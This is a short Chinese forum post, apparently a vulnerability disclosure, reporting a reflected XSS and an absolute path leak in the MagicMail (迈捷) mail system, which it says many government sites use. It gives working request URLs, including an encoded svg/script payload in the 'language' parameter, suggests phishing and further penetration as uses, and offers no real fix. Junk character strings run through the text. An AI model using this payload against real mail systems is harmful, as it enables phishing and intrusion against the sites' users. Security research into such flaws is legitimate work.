今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
4 H+ m# C* G* r+ D# V
K7 K# y! E1 N1 o
. D7 K( ~' q& b) n* L包含 一个反射性XSS 以及 绝对路径泄漏% C( E/ L% m$ S( @& B6 E, ~7 Q$ U5 N
看了看 貌似全部是linux的。
# }; \8 h, a1 o/ }4 P / a& u' i+ i6 ?% u
关键字:迈捷邮件系统 by MagicMail& W8 r3 ^9 r0 _9 E" L# a
3 T: ]1 S/ a2 n4 q( | e6 L/ o
可以看到很多政府网站都用这个邮件系统; U8 x8 Q* N' j* M, m: S1 V
" J8 ?1 R0 T, X- ]绝对路径 http://madman.in/index.php?login_type=declare&language=! z( N& _4 @3 N+ W6 w
, l" O, z( t. r- n" Y' _
3 Y/ }0 \1 J3 V: F# {- \' c9 j% P1 \/ S0 q9 g
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
6 K$ T. m6 o# q; E
0 \: b" @' O: L; e5 U, Q- e: f5 F9 \. q( y5 x- ~
3 b! A. y4 h. A; S" b1 f D虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等8 h4 {+ R g2 m3 Q8 g. y% f
) R- ~1 B9 L! O u2 U3 S0 Q
修复方案:看官方补丁吧。
9 {; {: }& u* z; l: D; q# M4 h |